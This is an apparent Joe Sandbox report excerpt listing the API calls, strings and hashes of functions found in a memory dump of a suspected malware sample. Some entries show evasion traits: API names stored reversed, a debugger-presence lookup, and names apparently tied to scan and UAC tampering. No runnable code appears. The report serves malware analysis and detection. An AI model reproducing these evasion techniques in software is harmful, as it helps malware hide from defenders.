                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                              • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                              • API String ID: 667068680-2233174745
                                                                                                              • Opcode ID: cbaff14ec414b9e988f5db0dbcd49c6a79cf88dd7bf7657e5f2e21429efb4201
                                                                                                              • Instruction ID: 947f6355517e600e94d67d7f6e8fbed8e23b2ed1546b76a90df6d807d3021f41
                                                                                                              • Opcode Fuzzy Hash: cbaff14ec414b9e988f5db0dbcd49c6a79cf88dd7bf7657e5f2e21429efb4201
                                                                                                              • Instruction Fuzzy Hash: D3F01CE4ED83906EFE00BF776C85C27275DA621688388FC95FC0369582EE7694588F31
                                                                                                              APIs
                                                                                                              • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02E428CE
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message
                                                                                                              • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                              • API String ID: 2030045667-32948583
                                                                                                              • Opcode ID: ffac67e86981970c5dc5e0d312fad79634ec739b40545042668cf0bee4306815
                                                                                                              • Instruction ID: 70e69b9f6f7bc9486762146e7c0386f2f3bb07da1895eab2effcf3d9447e6111
                                                                                                              • Opcode Fuzzy Hash: ffac67e86981970c5dc5e0d312fad79634ec739b40545042668cf0bee4306815
                                                                                                              • Instruction Fuzzy Hash: 97A11430E842548BDF21AA2CEC84BD8B6E5EB08354F14A0E5FE49AB385CF7599C5CF51
                                                                                                              Strings
                                                                                                              • Unexpected Memory Leak, xrefs: 02E428C0
                                                                                                              • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02E42849
                                                                                                              • , xrefs: 02E42814
                                                                                                              • bytes: , xrefs: 02E4275D
                                                                                                              • The unexpected small block leaks are:, xrefs: 02E42707
                                                                                                              • 7, xrefs: 02E426A1
                                                                                                              • An unexpected memory leak has occurred. , xrefs: 02E42690
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                              • API String ID: 0-2723507874
                                                                                                              • Opcode ID: 747eff63f39f372955d4fd987e113a7927f2bb3f9c06b642268ea7a060cb423a
                                                                                                              • Instruction ID: a9c7d869ca71eb7d497ec8568f8ee7b48c70e067ea580663f048d532572b51c1
                                                                                                              • Opcode Fuzzy Hash: 747eff63f39f372955d4fd987e113a7927f2bb3f9c06b642268ea7a060cb423a
                                                                                                              • Instruction Fuzzy Hash: 9B71E330E842988FDF219A2CDC84BD9BAE5EB09344F10A1E5FA49DB281DF754AC5CF51
                                                                                                              APIs
                                                                                                              • GetThreadLocale.KERNEL32(00000000,02E4C08B,?,?,00000000,00000000), ref: 02E4BDF6
                                                                                                                • Part of subcall function 02E4A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02E4A7E2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Locale$InfoThread
                                                                                                              • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                              • API String ID: 4232894706-2493093252
                                                                                                              • Opcode ID: e5fecb33cbb0147addb49aec0820e58708470f6b7c486e47de6eb85e3358d89b
                                                                                                              • Instruction ID: 2f62199d2800ac0e3f1631e5b732b8fff256d442b4761a562eff5a9e32ecf6b2
                                                                                                              • Opcode Fuzzy Hash: e5fecb33cbb0147addb49aec0820e58708470f6b7c486e47de6eb85e3358d89b
                                                                                                              • Instruction Fuzzy Hash: B3611B35BC41889BDB10EBA4F861B9F76BB9B88300F60F435B1019B785DE39D946CB51
                                                                                                              APIs
                                                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 02E5B000
                                                                                                              • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02E5B017
                                                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 02E5B0AB
                                                                                                              • IsBadReadPtr.KERNEL32(?,00000002), ref: 02E5B0B7
                                                                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 02E5B0CB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Read$HandleModule
                                                                                                              • String ID: KernelBase$LoadLibraryExA
                                                                                                              • API String ID: 2226866862-113032527
                                                                                                              • Opcode ID: 55f005616e1d7358bc1c13206e52e2edb0d6aeab4e5aa6358312e523518047d7
                                                                                                              • Instruction ID: a87c5992622f72bf48f63b19d4d8aad3022dbe5a73afe3567485b91b06bb7764
                                                                                                              • Opcode Fuzzy Hash: 55f005616e1d7358bc1c13206e52e2edb0d6aeab4e5aa6358312e523518047d7
                                                                                                              • Instruction Fuzzy Hash: 5C314F71A90315FBDB20DB69CC85F5AB7A8AF0535CF009554FE24EB2C5D730A940CB60
                                                                                                              APIs
                                                                                                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02E44423,?,?,02EC67C8,?,?,02E6E7A8,02E465B1,02E6D30D), ref: 02E44395
                                                                                                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02E44423,?,?,02EC67C8,?,?,02E6E7A8,02E465B1,02E6D30D), ref: 02E4439B
                                                                                                              • GetStdHandle.KERNEL32(000000F5,02E443E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02E44423,?,?,02EC67C8), ref: 02E443B0
                                                                                                              • WriteFile.KERNEL32(00000000,000000F5,02E443E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02E44423,?,?), ref: 02E443B6
                                                                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02E443D4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileHandleWrite$Message
                                                                                                              • String ID: Error$Runtime error at 00000000
                                                                                                              • API String ID: 1570097196-2970929446
                                                                                                              • Opcode ID: 44296a998d41afe88a939ef56de369234808d4c0770df57d18a81bf00325366f
                                                                                                              • Instruction ID: a90af8ee4d40cf5f4b926950c81deac578831aef801d8242b82cc968e0f82cff
                                                                                                              • Opcode Fuzzy Hash: 44296a998d41afe88a939ef56de369234808d4c0770df57d18a81bf00325366f
                                                                                                              • Instruction Fuzzy Hash: 1BF0F0A4FC434074FA20A3E07C0BF69235C4704F6AF64EA14B328AC1C1CFA050C18B22
                                                                                                              APIs
                                                                                                                • Part of subcall function 02E4AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02E4AD59
                                                                                                                • Part of subcall function 02E4AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02E4AD7D
                                                                                                                • Part of subcall function 02E4AD3C: GetModuleFileNameA.KERNEL32(02E40000,?,00000105), ref: 02E4AD98
                                                                                                                • Part of subcall function 02E4AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02E4AE2E
                                                                                                              • CharToOemA.USER32(?,?), ref: 02E4AEFB
                                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02E4AF18
                                                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02E4AF1E
                                                                                                              • GetStdHandle.KERNEL32(000000F4,02E4AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02E4AF33
                                                                                                              • WriteFile.KERNEL32(00000000,000000F4,02E4AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02E4AF39
                                                                                                              • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02E4AF5B
                                                                                                              • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02E4AF71
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 185507032-0
                                                                                                              • Opcode ID: 48171cbb7792d1a4ff955705c26d374eb67a930372b4f02db4caac3c0332a9a8
                                                                                                              • Instruction ID: 68e789a7ed89549deebb044c3439c5610cbb922af7b72907ffefcef3817613ae
                                                                                                              • Opcode Fuzzy Hash: 48171cbb7792d1a4ff955705c26d374eb67a930372b4f02db4caac3c0332a9a8
                                                                                                              • Instruction Fuzzy Hash: 521151F25C4304ABD200FB95EC85F9B77ADAB45710F809A25B744D61E0DE74E9448B62
                                                                                                              APIs
                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02E4E625
                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02E4E641
                                                                                                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02E4E67A
                                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02E4E6F7
                                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02E4E710
                                                                                                              • VariantCopy.OLEAUT32(?,00000000), ref: 02E4E745
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                              • String ID:
                                                                                                              • API String ID: 351091851-0
                                                                                                              • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                              • Instruction ID: b0ff75799b380bb929b5a2d7f23d8938f7bef3277fb022d7546eb450d13166d7
                                                                                                              • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                              • Instruction Fuzzy Hash: 4B510775A412299BCB22DF58DC80BD9B3BDBF49304F0495E5FA08E7201DA30AF818F64
                                                                                                              APIs
                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02E435BA
                                                                                                              • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02E43609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02E435ED
                                                                                                              • RegCloseKey.ADVAPI32(?,02E43610,00000000,?,00000004,00000000,02E43609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02E43603
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                              • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                              • API String ID: 3677997916-4173385793
                                                                                                              • Opcode ID: 9baa5fdc96c6fd843f860a0177df2a176a75da4aa346c09aeb65f4256c6845aa
                                                                                                              • Instruction ID: e7af962e898d2fdb628a52dc3bf1d10ff73629e3eaaf5a0296955f77ae5bf38d
                                                                                                              • Opcode Fuzzy Hash: 9baa5fdc96c6fd843f860a0177df2a176a75da4aa346c09aeb65f4256c6845aa
                                                                                                              • Instruction Fuzzy Hash: 2B01B5799C0219BAEB11DFA1AD02FBA77ECD708B00F6045E1FE04D6680EA74A950DA59
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
                                                                                                              • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
                                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 02E582D9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                              • String ID: Kernel32$sserddAcorPteG
                                                                                                              • API String ID: 667068680-1372893251
                                                                                                              • Opcode ID: 2ee59613ffa50eac00aabd654b461e934ead71184a7f28eb224cba16cd278841
                                                                                                              • Instruction ID: 7ab625b7bac050c9eab02fdba7dbcfaed43003a36cedae4801f33481e4349b25
                                                                                                              • Opcode Fuzzy Hash: 2ee59613ffa50eac00aabd654b461e934ead71184a7f28eb224cba16cd278841
                                                                                                              • Instruction Fuzzy Hash: BC0144757D4304AFEB04EBA5EC41F5EBBAEEB49B00F61D460BC00D7640DA74A941CE64
                                                                                                              APIs
                                                                                                              • GetThreadLocale.KERNEL32(?,00000000,02E4AAE7,?,?,00000000), ref: 02E4AA68
                                                                                                                • Part of subcall function 02E4A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02E4A7E2
                                                                                                              • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02E4AAE7,?,?,00000000), ref: 02E4AA98
                                                                                                              • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02E4AAA3
                                                                                                              • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02E4AAE7,?,?,00000000), ref: 02E4AAC1
                                                                                                              • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02E4AACC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Locale$InfoThread$CalendarEnum
                                                                                                              • String ID:
                                                                                                              • API String ID: 4102113445-0
                                                                                                              • Opcode ID: 1de87a62425527763e84225aecb2f65a7474382d94ae9b8469236c705c3c8179
                                                                                                              • Instruction ID: 86085ba5ed903cbee9988ba29ae5bde67a0bcc84ea4d8d04b8d5791c874e140e
                                                                                                              • Opcode Fuzzy Hash: 1de87a62425527763e84225aecb2f65a7474382d94ae9b8469236c705c3c8179
                                                                                                              • Instruction Fuzzy Hash: E001D4F12C02446AFA11EB64FD21B5B725DDB86720F51E1B1F500A6BC0DE759E009A64
                                                                                                              APIs
                                                                                                              • GetThreadLocale.KERNEL32(?,00000000,02E4ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02E4AB2F
                                                                                                                • Part of subcall function 02E4A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02E4A7E2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Locale$InfoThread
                                                                                                              • String ID: eeee$ggg$yyyy
                                                                                                              • API String ID: 4232894706-1253427255
                                                                                                              • Opcode ID: 494b12f72b4083f1bcabec0443e4c57775fbdf0e77e96d41ea344e19ffd706c9
                                                                                                              • Instruction ID: 9dff2b8b4702ddf60cae1a032cc8f73994b540e3b25d7779fe8f91a9029b48f9
                                                                                                              • Opcode Fuzzy Hash: 494b12f72b4083f1bcabec0443e4c57775fbdf0e77e96d41ea344e19ffd706c9
                                                                                                              • Instruction Fuzzy Hash: 9341E2717C45044B9B11EE78B8B47FEB2EBDB86224B51F535F442D3784EE28DA02CA21
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E5823C,?,?,00000000,?,02E57A7E,ntdll,00000000,00000000,02E57AC3,?,?,00000000), ref: 02E5820A
                                                                                                                • Part of subcall function 02E58274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
                                                                                                                • Part of subcall function 02E58274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
                                                                                                                • Part of subcall function 02E58274: GetProcAddress.KERNEL32(?,?), ref: 02E582D9
                                                                                                              • GetModuleHandleA.KERNELBASE(?), ref: 02E5821E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule$AddressProc
                                                                                                              • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                              • API String ID: 1883125708-1952140341
                                                                                                              • Opcode ID: 57e3c957c8e8a76e343a10a89ef10ac824ac3d049453cd6b72687b8f6bef62f5
                                                                                                              • Instruction ID: 23fa3ba61e8a96d9413e459e8632e1cfcabd8a07f19791c7138a98c44f9cbe73
                                                                                                              • Opcode Fuzzy Hash: 57e3c957c8e8a76e343a10a89ef10ac824ac3d049453cd6b72687b8f6bef62f5
                                                                                                              • Instruction Fuzzy Hash: 5BF09674AD4704AFEB00EFA9ED0195DBBEDE74A7007A1D460BC04D3610DA30AE50CD64
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(KernelBase,?,02E5FAEB,UacInitialize,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,ScanBuffer,02EC7380,02E6B7B8,ScanString,02EC7380,02E6B7B8,Initialize), ref: 02E5F6EE
                                                                                                              • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02E5F700
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                              • String ID: IsDebuggerPresent$KernelBase
                                                                                                              • API String ID: 1646373207-2367923768
                                                                                                              • Opcode ID: b3439a36e52e2c2326c578a3bab6e08389fa59aa7eaade4413c90e741b46dd41
                                                                                                              • Instruction ID: 551111a986692af82c0d28dd7ce611f475f0d1d3817ffa31fe573618287b098b
                                                                                                              • Opcode Fuzzy Hash: b3439a36e52e2c2326c578a3bab6e08389fa59aa7eaade4413c90e741b46dd41
                                                                                                              • Instruction Fuzzy Hash: 7DD012E17F136019FE0073F42CC4C19038C855752D720BE60F822C6492E9A688195014
                                                                                                              APIs
